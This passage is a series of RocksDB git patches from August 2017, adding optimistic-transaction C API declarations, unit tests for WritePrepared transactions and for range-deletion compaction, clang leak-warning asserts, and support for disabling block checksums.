size_t klen, char** errptr); @@ -1349,6 +1368,10 @@ extern ROCKSDB_LIBRARY_API rocksdb_iterator_t* rocksdb_transaction_create_iterator(rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options); +extern ROCKSDB_LIBRARY_API rocksdb_iterator_t* 
+rocksdb_transactiondb_create_iterator(rocksdb_transactiondb_t* txn_db, + const rocksdb_readoptions_t* options); + extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_close( rocksdb_transactiondb_t* txn_db); @@ -1356,6 +1379,20 @@ extern ROCKSDB_LIBRARY_API rocksdb_checkpoint_t* rocksdb_transactiondb_checkpoint_object_create(rocksdb_transactiondb_t* txn_db, char** errptr); +extern ROCKSDB_LIBRARY_API rocksdb_optimistictransactiondb_t* +rocksdb_optimistictransactiondb_open(const rocksdb_options_t* options, + const char* name, char** errptr); + +extern ROCKSDB_LIBRARY_API rocksdb_transaction_t* +rocksdb_optimistictransaction_begin( + rocksdb_optimistictransactiondb_t* otxn_db, + const rocksdb_writeoptions_t* write_options, + const rocksdb_optimistictransaction_options_t* otxn_options, + rocksdb_transaction_t* old_txn); + +extern ROCKSDB_LIBRARY_API void rocksdb_optimistictransactiondb_close( + rocksdb_optimistictransactiondb_t* otxn_db); + /* Transaction Options */ extern ROCKSDB_LIBRARY_API rocksdb_transactiondb_options_t* @@ -1404,6 +1441,17 @@ extern ROCKSDB_LIBRARY_API void rocksdb_transaction_options_set_max_write_batch_size( rocksdb_transaction_options_t* opt, size_t size); + +extern ROCKSDB_LIBRARY_API rocksdb_optimistictransaction_options_t* +rocksdb_optimistictransaction_options_create(); + +extern ROCKSDB_LIBRARY_API void rocksdb_optimistictransaction_options_destroy( + rocksdb_optimistictransaction_options_t* opt); + +extern ROCKSDB_LIBRARY_API void +rocksdb_optimistictransaction_options_set_set_snapshot( + rocksdb_optimistictransaction_options_t* opt, unsigned char v); + // referring to convention (3), this should be used by client // to free memory that was malloc()ed extern ROCKSDB_LIBRARY_API void rocksdb_free(void* ptr); From cd26af34767a3e4319cda407ae021d38d48c6ac1 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Wed, 23 Aug 2017 13:49:29 -0700 Subject: [PATCH 146/205] Add unit test for WritePrepared skeleton Summary: Closes https://github.com/facebook/rocksdb/pull/2756 Differential Revision: D5660516 Pulled By: maysamyabandeh fbshipit-source-id: f3f3d3b5f544007a7fbdd78e49e4738b4437c7ee --- .../pessimistic_transaction_db.cc | 8 +- .../transactions/pessimistic_transaction_db.h | 27 +++- utilities/transactions/transaction_test.cc | 148 ++++++++++++++++-- 3 files changed, 164 insertions(+), 19 deletions(-) diff --git a/utilities/transactions/pessimistic_transaction_db.cc b/utilities/transactions/pessimistic_transaction_db.cc index 5304340543a..07c3eeeeb04 100644 --- a/utilities/transactions/pessimistic_transaction_db.cc +++ b/utilities/transactions/pessimistic_transaction_db.cc @@ -607,6 +607,7 @@ void WritePreparedTxnDB::AddCommitted(uint64_t prepare_seq, delayed_prepared_empty_.store(false, std::memory_order_release); } } + // With each change to max_evicted_seq_ fetch the live snapshots behind it { WriteLock wl(&snapshots_mutex_); InstrumentedMutex(db_impl_->mutex()); @@ -622,9 +623,7 @@ void WritePreparedTxnDB::AddCommitted(uint64_t prepare_seq, // be kept around because it overlaps with a live snapshot. 
{ ReadLock rl(&snapshots_mutex_); - for (auto snapshot : snapshots_) { - auto snapshot_seq = - reinterpret_cast(snapshot)->number_; + for (auto snapshot_seq : snapshots_) { if (evicted.commit_seq <= snapshot_seq) { break; } @@ -691,5 +690,8 @@ bool WritePreparedTxnDB::ExchangeCommitEntry(uint64_t indexed_seq, return true; } +// 10m entry, 80MB size +uint64_t WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE = + static_cast(1 << 21); } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/transactions/pessimistic_transaction_db.h b/utilities/transactions/pessimistic_transaction_db.h index 4d1a5f4b511..489da30bfcb 100644 --- a/utilities/transactions/pessimistic_transaction_db.h +++ b/utilities/transactions/pessimistic_transaction_db.h @@ -161,11 +161,17 @@ class WritePreparedTxnDB : public PessimisticTransactionDB { public: explicit WritePreparedTxnDB(DB* db, const TransactionDBOptions& txn_db_options) - : PessimisticTransactionDB(db, txn_db_options) {} + : PessimisticTransactionDB(db, txn_db_options), + COMMIT_CACHE_SIZE(DEF_COMMIT_CACHE_SIZE) { + init(txn_db_options); + } explicit WritePreparedTxnDB(StackableDB* db, const TransactionDBOptions& txn_db_options) - : PessimisticTransactionDB(db, txn_db_options) {} + : PessimisticTransactionDB(db, txn_db_options), + COMMIT_CACHE_SIZE(DEF_COMMIT_CACHE_SIZE) { + init(txn_db_options); + } virtual ~WritePreparedTxnDB() {} @@ -183,6 +189,13 @@ class WritePreparedTxnDB : public PessimisticTransactionDB { void AddCommitted(uint64_t prepare_seq, uint64_t commit_seq); private: + friend class WritePreparedTransactionTest_IsInSnapshotTest_Test; + + void init(const TransactionDBOptions& /* unused */) { + commit_cache_ = + unique_ptr(new CommitEntry[COMMIT_CACHE_SIZE]{}); + } + // A heap with the amortized O(1) complexity for erase. It uses one extra heap // to keep track of erased entries that are not yet on top of the main heap. class PreparedHeap { @@ -236,11 +249,11 @@ class WritePreparedTxnDB : public PessimisticTransactionDB { // A heap of prepared transactions. Thread-safety is provided with // prepared_mutex_. PreparedHeap prepared_txns_; - // 10m entry, 80MB size - static const uint64_t COMMIT_CACHE_SIZE = static_cast(1 << 21); - // commit_cache_ is initialized to zero to tell apart an empty index from a - // filled one. Thread-safety is provided with commit_cache_mutex_. - CommitEntry commit_cache_[COMMIT_CACHE_SIZE] = {}; + static uint64_t DEF_COMMIT_CACHE_SIZE; + const uint64_t COMMIT_CACHE_SIZE; + // commit_cache_ must be initialized to zero to tell apart an empty index from + // a filled one. Thread-safety is provided with commit_cache_mutex_. 
+ unique_ptr commit_cache_; // The largest evicted *commit* sequence number from the commit_cache_ std::atomic max_evicted_seq_ = {}; // A map of the evicted entries from commit_cache_ that has to be kept around diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc index 0eaaf20acb6..2e8c87f49ac 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -17,7 +17,6 @@ #include "rocksdb/utilities/transaction_db.h" #include "table/mock_table.h" #include "util/fault_injection_test_env.h" -#include "util/logging.h" #include "util/random.h" #include "util/string_util.h" #include "util/sync_point.h" @@ -26,6 +25,7 @@ #include "util/transaction_test_util.h" #include "utilities/merge_operators.h" #include "utilities/merge_operators/string_append/stringappend.h" +#include "utilities/transactions/pessimistic_transaction_db.h" #include "port/port.h" @@ -33,8 +33,8 @@ using std::string; namespace rocksdb { -class TransactionTest - : public ::testing::TestWithParam> { +class TransactionTest : public ::testing::TestWithParam< + std::tuple> { public: TransactionDB* db; FaultInjectionTestEnv* env; @@ -57,6 +57,7 @@ class TransactionTest DestroyDB(dbname, options); txn_db_options.transaction_lock_timeout = 0; txn_db_options.default_lock_timeout = 0; + txn_db_options.write_policy = std::get<2>(GetParam()); Status s; if (std::get<0>(GetParam()) == false) { s = TransactionDB::Open(options, txn_db_options, dbname, &db); @@ -123,16 +124,23 @@ class TransactionTest }; class MySQLStyleTransactionTest : public TransactionTest {}; +class WritePreparedTransactionTest : public TransactionTest {}; +static const TxnDBWritePolicy wc = WRITE_COMMITTED; +static const TxnDBWritePolicy wp = WRITE_PREPARED; +// TODO(myabandeh): Instantiate the tests with other write policies INSTANTIATE_TEST_CASE_P(DBAsBaseDB, TransactionTest, - ::testing::Values(std::make_tuple(false, false))); + ::testing::Values(std::make_tuple(false, false, wc))); INSTANTIATE_TEST_CASE_P(StackableDBAsBaseDB, TransactionTest, - ::testing::Values(std::make_tuple(true, false))); + ::testing::Values(std::make_tuple(true, false, wc))); INSTANTIATE_TEST_CASE_P(MySQLStyleTransactionTest, MySQLStyleTransactionTest, - ::testing::Values(std::make_tuple(false, false), - std::make_tuple(false, true), - std::make_tuple(true, false), - std::make_tuple(true, true))); + ::testing::Values(std::make_tuple(false, false, wc), + std::make_tuple(false, true, wc), + std::make_tuple(true, false, wc), + std::make_tuple(true, true, wc))); +INSTANTIATE_TEST_CASE_P(WritePreparedTransactionTest, + WritePreparedTransactionTest, + ::testing::Values(std::make_tuple(false, true, wp))); TEST_P(TransactionTest, DoubleEmptyWrite) { WriteOptions write_options; @@ -4720,6 +4728,128 @@ TEST_P(TransactionTest, MemoryLimitTest) { delete txn; } +// Test WritePreparedTxnDB's IsInSnapshot against different ordering of +// snapshot, max_committed_seq_, prepared, and commit entries. +TEST_P(WritePreparedTransactionTest, IsInSnapshotTest) { + WriteOptions wo; + // Use small commit cache to trigger lots of eviction and fast advance of + // max_evicted_seq_ + WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE = + 8; // will take effect after ReOpen + + // Take some preliminary snapshots first. This is to stress the data structure + // that holds the old snapshots as it will be designed to be efficient when + // only a few snapshots are below the max_evicted_seq_. 
+ for (int max_snapshots = 1; max_snapshots < 20; max_snapshots++) { + // Leave some gap between the preliminary snapshots and the final snapshot + // that we check. This should also test for different overlapping scenarios + // between the last snapshot and the commits. + for (int max_gap = 1; max_gap < 10; max_gap++) { + // Since we do not actually write to db, we mock the seq as it would be + // increased by the db. The only exception is that we need db seq to + // advance for our snapshots, for which we apply a dummy put each time we + // increase our mock of seq. + uint64_t seq = 0; + // At each step we prepare a txn and then we commit it in the next txn. + // This emulates the consecutive transactions that write to the same key + uint64_t cur_txn = 0; + // Number of snapshots taken so far + int num_snapshots = 0; + // Number of gaps applied so far + int gap_cnt = 0; + // The final snapshot that we will inspect + uint64_t snapshot = 0; + bool found_committed = false; + // To stress the data structure that maintains prepared txns, at each cycle + // we add a new prepare txn. These are not meant to be committed for + // snapshot inspection. + std::set<uint64_t> prepared; + // We keep the list of txns committed before we take the last snapshot. + // These should be the only seq numbers that will be found in the snapshot + std::set<uint64_t> committed_before; + ReOpen(); // to restart the db + WritePreparedTxnDB* wp_db = dynamic_cast<WritePreparedTxnDB*>(db); + assert(wp_db); + assert(wp_db->db_impl_); + // We continue until max advances a bit beyond the snapshot. + while (!snapshot || wp_db->max_evicted_seq_ < snapshot + 100) { + // do prepare for a transaction + wp_db->db_impl_->Put(wo, "key", "value"); // dummy put to inc db seq + seq++; + ASSERT_EQ(wp_db->db_impl_->GetLatestSequenceNumber(), seq); + wp_db->AddPrepared(seq); + prepared.insert(seq); + + // If cur_txn is not started, do prepare for it. + if (!cur_txn) { + wp_db->db_impl_->Put(wo, "key", "value"); // dummy put to inc db seq + seq++; + ASSERT_EQ(wp_db->db_impl_->GetLatestSequenceNumber(), seq); + cur_txn = seq; + wp_db->AddPrepared(cur_txn); + } else { // else commit it + wp_db->db_impl_->Put(wo, "key", "value"); // dummy put to inc db seq + seq++; + ASSERT_EQ(wp_db->db_impl_->GetLatestSequenceNumber(), seq); + wp_db->AddCommitted(cur_txn, seq); + if (!snapshot) { + committed_before.insert(cur_txn); + } + cur_txn = 0; + } + + if (num_snapshots < max_snapshots - 1) { + // Take preliminary snapshots + db->GetSnapshot(); + num_snapshots++; + } else if (gap_cnt < max_gap) { + // Wait for some gap before taking the final snapshot + gap_cnt++; + } else if (!snapshot) { + // Take the final snapshot if it is not already taken + snapshot = db->GetSnapshot()->GetSequenceNumber(); + // We increase the db seq artificially by a dummy Put. Check that this + // technique is effective and db seq is the same as ours. + ASSERT_EQ(snapshot, seq); + num_snapshots++; + } + + // If the snapshot is taken, verify seq numbers visible to it. We redo + // it at each cycle to test that the system is still sound when + // max_evicted_seq_ advances.
+ if (snapshot) { + for (uint64_t s = 0; s <= seq; s++) { + bool was_committed = + (committed_before.find(s) != committed_before.end()); + bool is_in_snapshot = wp_db->IsInSnapshot(s, snapshot); + if (was_committed != is_in_snapshot) { + printf( + "max_snapshots %d max_gap %d seq %lu max %lu snapshot %lu " + "gap_cnt %d num_snapshots %d\n", + max_snapshots, max_gap, seq, wp_db->max_evicted_seq_.load(), + snapshot, gap_cnt, num_snapshots); + } + ASSERT_EQ(was_committed, is_in_snapshot); + found_committed = found_committed || is_in_snapshot; + } + } + } + // Safety check to make sure the test actually ran + ASSERT_TRUE(found_committed); + // As an extra check, check if prepared set will be properly empty after + // they are committed. + if (cur_txn) { + wp_db->AddCommitted(cur_txn, seq); + } + for (auto p : prepared) { + wp_db->AddCommitted(p, seq); + } + ASSERT_TRUE(wp_db->delayed_prepared_.empty()); + ASSERT_TRUE(wp_db->prepared_txns_.empty()); + } + } +} + } // namespace rocksdb int main(int argc, char** argv) { From 7eba54eb9b769246a6e93fa96155e034fde01a5d Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 23 Aug 2017 14:05:30 -0700 Subject: [PATCH 147/205] test compaction input-level split range tombstone assumption Summary: One of the core assumptions of DeleteRange is that files containing portions of the same range tombstone are treated as a single unit from the perspective of compaction picker. Need better tests for this. This PR adds the tests for manual compaction. Closes https://github.com/facebook/rocksdb/pull/2769 Differential Revision: D5676677 Pulled By: ajkr fbshipit-source-id: 1b4b3382b300ff7048b872911405fdf900e4fbec --- db/db_range_del_test.cc | 68 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 68 insertions(+) diff --git a/db/db_range_del_test.cc b/db/db_range_del_test.cc index d80c9d14495..dbc27e870c1 100644 --- a/db/db_range_del_test.cc +++ b/db/db_range_del_test.cc @@ -894,6 +894,74 @@ TEST_F(DBRangeDelTest, MemtableBloomFilter) { } } +TEST_F(DBRangeDelTest, CompactionTreatsSplitInputLevelDeletionAtomically) { + // make sure compaction treats files containing a split range deletion in the + // input level as an atomic unit. I.e., compacting any input-level file(s) + // containing a portion of the range deletion causes all other input-level + // files containing portions of that same range deletion to be included in the + // compaction. + const int kNumFilesPerLevel = 4, kValueBytes = 4 << 10; + Options options = CurrentOptions(); + options.compression = kNoCompression; + options.level0_file_num_compaction_trigger = kNumFilesPerLevel; + options.memtable_factory.reset( + new SpecialSkipListFactory(2 /* num_entries_flush */)); + options.target_file_size_base = kValueBytes; + // i == 0: CompactFiles + // i == 1: CompactRange + // i == 2: automatic compaction + for (int i = 0; i < 3; ++i) { + DestroyAndReopen(options); + + ASSERT_OK(Put(Key(0), "")); + ASSERT_OK(db_->Flush(FlushOptions())); + MoveFilesToLevel(2); + ASSERT_EQ(1, NumTableFilesAtLevel(2)); + + // snapshot protects range tombstone from dropping due to becoming obsolete. 
+    const Snapshot* snapshot = db_->GetSnapshot();
+    db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), Key(0),
+                     Key(2 * kNumFilesPerLevel));
+
+    Random rnd(301);
+    std::string value = RandomString(&rnd, kValueBytes);
+    for (int j = 0; j < kNumFilesPerLevel; ++j) {
+      // give files overlapping key-ranges to prevent trivial move
+      ASSERT_OK(Put(Key(j), value));
+      ASSERT_OK(Put(Key(2 * kNumFilesPerLevel - 1 - j), value));
+      if (j > 0) {
+        dbfull()->TEST_WaitForFlushMemTable();
+        ASSERT_EQ(j, NumTableFilesAtLevel(0));
+      }
+    }
+    // put extra key to trigger final flush
+    ASSERT_OK(Put("", ""));
+    dbfull()->TEST_WaitForFlushMemTable();
+    dbfull()->TEST_WaitForCompact();
+    ASSERT_EQ(0, NumTableFilesAtLevel(0));
+    ASSERT_EQ(kNumFilesPerLevel, NumTableFilesAtLevel(1));
+
+    ColumnFamilyMetaData meta;
+    db_->GetColumnFamilyMetaData(&meta);
+    if (i == 0) {
+      ASSERT_OK(db_->CompactFiles(
+          CompactionOptions(), {meta.levels[1].files[0].name}, 2 /* level */));
+    } else if (i == 1) {
+      auto begin_str = Key(0), end_str = Key(1);
+      Slice begin = begin_str, end = end_str;
+      ASSERT_OK(db_->CompactRange(CompactRangeOptions(), &begin, &end));
+    } else if (i == 2) {
+      ASSERT_OK(db_->SetOptions(db_->DefaultColumnFamily(),
+                                {{"max_bytes_for_level_base", "10000"}}));
+      dbfull()->TEST_WaitForCompact();
+    }
+    ASSERT_EQ(0, NumTableFilesAtLevel(1));
+    ASSERT_GT(NumTableFilesAtLevel(2), 0);
+
+    db_->ReleaseSnapshot(snapshot);
+  }
+}
+
 #endif  // ROCKSDB_LITE

 }  // namespace rocksdb

From 19cc66dc4f8ab765f4e1415115fe4639c878a210 Mon Sep 17 00:00:00 2001
From: Andrew Kryczka
Date: Wed, 23 Aug 2017 14:55:26 -0700
Subject: [PATCH 148/205] fix clang bug in block-based table reader

Summary:
This is the warning that clang considers a bug and has been causing the build to fail:
```
table/block_based_table_reader.cc:240:27: warning: Potential leak of memory pointed to by 'block.value'
    for (; biter.Valid(); biter.Next()) {
                          ^~~~~
```
Actually clang just doesn't have enough knowledge to statically determine that it's safe. We can teach it using an assert.
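To see why the assert helps, here is a minimal standalone sketch (illustrative only, not RocksDB code; `Block` and `Load` are made-up stand-ins) of the pattern the analyzer complains about and how an assert prunes the impossible path:

```cpp
#include <cassert>
#include <new>

struct Block {
  int* value = nullptr;
};

// Stand-in loader that allocates only on success; on failure it leaves
// block->value null, which is the invariant the assert below encodes.
bool Load(Block* block) {
  block->value = new (std::nothrow) int(42);
  return block->value != nullptr;
}

void Use() {
  Block block;
  bool ok = Load(&block);
  // Without this assert, the analyzer explores a path where Load() reported
  // failure but block.value still owns memory, and flags a leak at the early
  // return. The assert tells it that path cannot happen.
  assert(ok || block.value == nullptr);
  if (!ok) {
    return;
  }
  delete block.value;
}
```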
Closes https://github.com/facebook/rocksdb/pull/2779

Differential Revision: D5691225

Pulled By: ajkr

fbshipit-source-id: 3f0d545bf44636953b30ee5243c63239e8f16d8e
---
 table/block_based_table_reader.cc | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc
index e047c644325..d8c6d807c8c 100644
--- a/table/block_based_table_reader.cc
+++ b/table/block_based_table_reader.cc
@@ -257,6 +257,7 @@ class PartitionIndexReader : public IndexReader, public Cleanable {
           handle, compression_dict, &block, is_index);
+      assert(s.ok() || block.value == nullptr);
       if (s.ok() && block.value != nullptr) {
         assert(block.cache_handle != nullptr);
         if (pin) {
@@ -1429,6 +1430,7 @@ Status BlockBasedTable::MaybeLoadDataBlockToCache(
     FilePrefetchBuffer* prefetch_buffer, Rep* rep, const ReadOptions& ro,
     const BlockHandle& handle, Slice compression_dict,
     CachableEntry<Block>* block_entry, bool is_index) {
+  assert(block_entry != nullptr);
   const bool no_io = (ro.read_tier == kBlockCacheTier);
   Cache* block_cache = rep->table_options.block_cache.get();
   Cache* block_cache_compressed =
@@ -1485,6 +1487,7 @@ Status BlockBasedTable::MaybeLoadDataBlockToCache(
       }
     }
   }
+  assert(s.ok() || block_entry->value == nullptr);
   return s;
 }

From 7fbb9eccafb2421a020a60b26e0413d3cff1cdf0 Mon Sep 17 00:00:00 2001
From: Andrew Kryczka
Date: Wed, 23 Aug 2017 19:31:40 -0700
Subject: [PATCH 149/205] support disabling checksum in block-based table

Summary:
Store a zero as the checksum when disabled, since it's easier to keep the block trailer a fixed length.

Closes https://github.com/facebook/rocksdb/pull/2781

Differential Revision: D5694702

Pulled By: ajkr

fbshipit-source-id: 69cea9da415778ba2b600dfd9d0dfc8cb5188ecd
---
 HISTORY.md                         |  1 +
 db/db_basic_test.cc                | 52 +++++++++++++-----------------
 include/rocksdb/table.h            |  2 +-
 table/block_based_table_builder.cc |  5 ++-
 table/format.cc                    |  4 ++-
 tools/db_stress.cc                 | 30 ++++++++++++++++-
 6 files changed, 59 insertions(+), 35 deletions(-)

diff --git a/HISTORY.md b/HISTORY.md
index a63d9d62861..581e6b3ad58 100644
--- a/HISTORY.md
+++ b/HISTORY.md
@@ -10,6 +10,7 @@
 * Universal compactions including the bottom level can be executed in a dedicated thread pool. This alleviates head-of-line blocking in the compaction queue, which causes write stalling, particularly in multi-instance use cases. Users can enable this feature via `Env::SetBackgroundThreads(N, Env::Priority::BOTTOM)`, where `N > 0`.
 * Allow merge operator to be called even with a single merge operand during compactions, by appropriately overriding `MergeOperator::AllowSingleOperand`.
 * Add `DB::VerifyChecksum()`, which verifies the checksums in all SST files in a running DB.
+* Block-based table support for disabling checksums by setting `BlockBasedTableOptions::checksum = kNoChecksum`.

 ### Bug Fixes
 * Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`.
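Before the diffs below, the core idea in isolation: the block trailer keeps a fixed 5-byte layout (1 type byte plus a 4-byte checksum slot), and kNoChecksum simply zero-fills the slot. A hedged, self-contained sketch of that idea (simplified; `FakeChecksum` is a stand-in for illustration, not RocksDB's crc32c, and the real trailer checksum also covers the type byte):

```cpp
#include <cstdint>
#include <cstring>

enum ChecksumType : char { kNoChecksum = 0x0, kCRC32c = 0x1, kxxHash = 0x2 };

// Stand-in for a real checksum function (assumption for illustration only).
uint32_t FakeChecksum(const char* data, size_t n) {
  uint32_t h = 0;
  for (size_t i = 0; i < n; i++) {
    h = h * 31 + static_cast<unsigned char>(data[i]);
  }
  return h;
}

// The trailer stays a fixed 5 bytes: 1 type byte plus a 4-byte checksum
// slot. With kNoChecksum the slot is zero-filled rather than omitted, so
// readers never have to handle a variable-length trailer.
void WriteTrailer(char trailer[5], char type_byte, ChecksumType checksum_type,
                  const char* block, size_t block_size) {
  trailer[0] = type_byte;
  uint32_t checksum = 0;  // kNoChecksum: store zero
  if (checksum_type != kNoChecksum) {
    checksum = FakeChecksum(block, block_size);
  }
  std::memcpy(trailer + 1, &checksum, sizeof(checksum));
}
```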
diff --git a/db/db_basic_test.cc b/db/db_basic_test.cc
index a2604081b4d..654a457ef5d 100644
--- a/db/db_basic_test.cc
+++ b/db/db_basic_test.cc
@@ -792,36 +792,30 @@ TEST_F(DBBasicTest, MultiGetEmpty) {
 TEST_F(DBBasicTest, ChecksumTest) {
   BlockBasedTableOptions table_options;
   Options options = CurrentOptions();
+  // change when new checksum type added
+  int max_checksum = static_cast<int>(kxxHash);
+  const int kNumPerFile = 2;
+
+  // generate one table with each type of checksum
+  for (int i = 0; i <= max_checksum; ++i) {
+    table_options.checksum = static_cast<ChecksumType>(i);
+    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
+    Reopen(options);
+    for (int j = 0; j < kNumPerFile; ++j) {
+      ASSERT_OK(Put(Key(i * kNumPerFile + j), Key(i * kNumPerFile + j)));
+    }
+    ASSERT_OK(Flush());
+  }

-  table_options.checksum = kCRC32c;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  Reopen(options);
-  ASSERT_OK(Put("a", "b"));
-  ASSERT_OK(Put("c", "d"));
-  ASSERT_OK(Flush());  // table with crc checksum
-
-  table_options.checksum = kxxHash;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  Reopen(options);
-  ASSERT_OK(Put("e", "f"));
-  ASSERT_OK(Put("g", "h"));
-  ASSERT_OK(Flush());  // table with xxhash checksum
-
-  table_options.checksum = kCRC32c;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  Reopen(options);
-  ASSERT_EQ("b", Get("a"));
-  ASSERT_EQ("d", Get("c"));
-  ASSERT_EQ("f", Get("e"));
-  ASSERT_EQ("h", Get("g"));
-
-  table_options.checksum = kCRC32c;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  Reopen(options);
-  ASSERT_EQ("b", Get("a"));
-  ASSERT_EQ("d", Get("c"));
-  ASSERT_EQ("f", Get("e"));
-  ASSERT_EQ("h", Get("g"));
+  // verify data with each type of checksum
+  for (int i = 0; i <= kxxHash; ++i) {
+    table_options.checksum = static_cast<ChecksumType>(i);
+    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
+    Reopen(options);
+    for (int j = 0; j < (max_checksum + 1) * kNumPerFile; ++j) {
+      ASSERT_EQ(Key(j), Get(Key(j)));
+    }
+  }
 }

 // On Windows you can have either memory mapped file or a file

diff --git a/include/rocksdb/table.h b/include/rocksdb/table.h
index 04e532e161c..1b4c0ced90d 100644
--- a/include/rocksdb/table.h
+++ b/include/rocksdb/table.h
@@ -43,7 +43,7 @@ struct Options;
 using std::unique_ptr;

 enum ChecksumType : char {
-  kNoChecksum = 0x0,  // not yet supported. Will fail
+  kNoChecksum = 0x0,
   kCRC32c = 0x1,
   kxxHash = 0x2,
 };

diff --git a/table/block_based_table_builder.cc b/table/block_based_table_builder.cc
index e87def73e7e..d42e0f8b7aa 100644
--- a/table/block_based_table_builder.cc
+++ b/table/block_based_table_builder.cc
@@ -551,9 +551,8 @@ void BlockBasedTableBuilder::WriteRawBlock(const Slice& block_contents,
   char* trailer_without_type = trailer + 1;
   switch (r->table_options.checksum) {
     case kNoChecksum:
-      // we don't support no checksum yet
-      assert(false);
-      // intentional fallthrough
+      EncodeFixed32(trailer_without_type, 0);
+      break;
     case kCRC32c: {
       auto crc = crc32c::Value(block_contents.data(), block_contents.size());
       crc = crc32c::Extend(crc, trailer, 1);  // Extend to cover block type

diff --git a/table/format.cc b/table/format.cc
index e5f2df0074a..364766e9a80 100644
--- a/table/format.cc
+++ b/table/format.cc
@@ -102,7 +102,7 @@ inline uint64_t UpconvertLegacyFooterFormat(uint64_t magic_number) {
 //    to make the total size 2 * BlockHandle::kMaxEncodedLength
 //    table_magic_number (8 bytes)
 // new footer format:
-//    checksum (char, 1 byte)
+//    checksum type (char, 1 byte)
 //    metaindex handle (varint64 offset, varint64 size)
 //    index handle (varint64 offset, varint64 size)
 //    to make the total size 2 * BlockHandle::kMaxEncodedLength + 1
@@ -278,6 +278,8 @@ Status CheckBlockChecksum(const ReadOptions& options, const Footer& footer,
   uint32_t value = DecodeFixed32(data + block_size + 1);
   uint32_t actual = 0;
   switch (footer.checksum()) {
+    case kNoChecksum:
+      break;
     case kCRC32c:
       value = crc32c::Unmask(value);
       actual = crc32c::Value(data, block_size + 1);

diff --git a/tools/db_stress.cc b/tools/db_stress.cc
index 86776cf9737..d18eeab0c75 100644
--- a/tools/db_stress.cc
+++ b/tools/db_stress.cc
@@ -44,6 +44,7 @@ int main() {
 #include "db/version_set.h"
 #include "hdfs/env_hdfs.h"
 #include "monitoring/histogram.h"
+#include "options/options_helper.h"
 #include "port/port.h"
 #include "rocksdb/cache.h"
 #include "rocksdb/env.h"
@@ -426,10 +427,30 @@ enum rocksdb::CompressionType StringToCompressionType(const char* ctype) {
   else if (!strcasecmp(ctype, "zstd"))
     return rocksdb::kZSTD;

-  fprintf(stdout, "Cannot parse compression type '%s'\n", ctype);
+  fprintf(stderr, "Cannot parse compression type '%s'\n", ctype);
   return rocksdb::kSnappyCompression;  // default value
 }

+enum rocksdb::ChecksumType StringToChecksumType(const char* ctype) {
+  assert(ctype);
+  auto iter = rocksdb::checksum_type_string_map.find(ctype);
+  if (iter != rocksdb::checksum_type_string_map.end()) {
+    return iter->second;
+  }
+  fprintf(stderr, "Cannot parse checksum type '%s'\n", ctype);
+  return rocksdb::kCRC32c;
+}
+
+std::string ChecksumTypeToString(rocksdb::ChecksumType ctype) {
+  auto iter = std::find_if(
+      rocksdb::checksum_type_string_map.begin(),
+      rocksdb::checksum_type_string_map.end(),
+      [&](const std::pair<std::string, rocksdb::ChecksumType>&
+              name_and_enum_val) { return name_and_enum_val.second == ctype; });
+  assert(iter != rocksdb::checksum_type_string_map.end());
+  return iter->first;
+}
+
 std::vector<std::string> SplitString(std::string src) {
   std::vector<std::string> ret;
   if (src.empty()) {
@@ -451,6 +472,9 @@ DEFINE_string(compression_type, "snappy",
 static enum rocksdb::CompressionType FLAGS_compression_type_e =
     rocksdb::kSnappyCompression;

+DEFINE_string(checksum_type, "kCRC32c", "Algorithm to use to checksum blocks");
+static enum rocksdb::ChecksumType FLAGS_checksum_type_e = rocksdb::kCRC32c;
+
 DEFINE_string(hdfs, "", "Name of hdfs environment");
 // posix or hdfs environment
 static rocksdb::Env* FLAGS_env =
rocksdb::Env::Default(); @@ -2128,6 +2152,8 @@ class StressTest { 1 << FLAGS_log2_keys_per_lock); std::string compression = CompressionTypeToString(FLAGS_compression_type_e); fprintf(stdout, "Compression : %s\n", compression.c_str()); + std::string checksum = ChecksumTypeToString(FLAGS_checksum_type_e); + fprintf(stdout, "Checksum type : %s\n", checksum.c_str()); fprintf(stdout, "Max subcompactions : %" PRIu64 "\n", FLAGS_subcompactions); @@ -2162,6 +2188,7 @@ class StressTest { BlockBasedTableOptions block_based_options; block_based_options.block_cache = cache_; block_based_options.block_cache_compressed = compressed_cache_; + block_based_options.checksum = FLAGS_checksum_type_e; block_based_options.block_size = FLAGS_block_size; block_based_options.format_version = 2; block_based_options.filter_policy = filter_policy_; @@ -2412,6 +2439,7 @@ int main(int argc, char** argv) { } FLAGS_compression_type_e = StringToCompressionType(FLAGS_compression_type.c_str()); + FLAGS_checksum_type_e = StringToChecksumType(FLAGS_checksum_type.c_str()); if (!FLAGS_hdfs.empty()) { FLAGS_env = new rocksdb::HdfsEnv(FLAGS_hdfs); } From 7fdf735d5dd71b7f92a1ff5a64312ff1bc08c5d3 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Thu, 24 Aug 2017 12:20:15 -0700 Subject: [PATCH 150/205] Pinnableslice examples and blog post Summary: Closes https://github.com/facebook/rocksdb/pull/2788 Differential Revision: D5700189 Pulled By: maysamyabandeh fbshipit-source-id: 6f043e652093ff904e52f6d35190855781b87673 --- ...17-05-12-partitioned-index-filter.markdown | 2 +- docs/_posts/2017-08-24-pinnableslice.markdown | 37 +++++++++++++++++++ examples/simple_example.cc | 27 ++++++++++++++ 3 files changed, 65 insertions(+), 1 deletion(-) create mode 100644 docs/_posts/2017-08-24-pinnableslice.markdown diff --git a/docs/_posts/2017-05-12-partitioned-index-filter.markdown 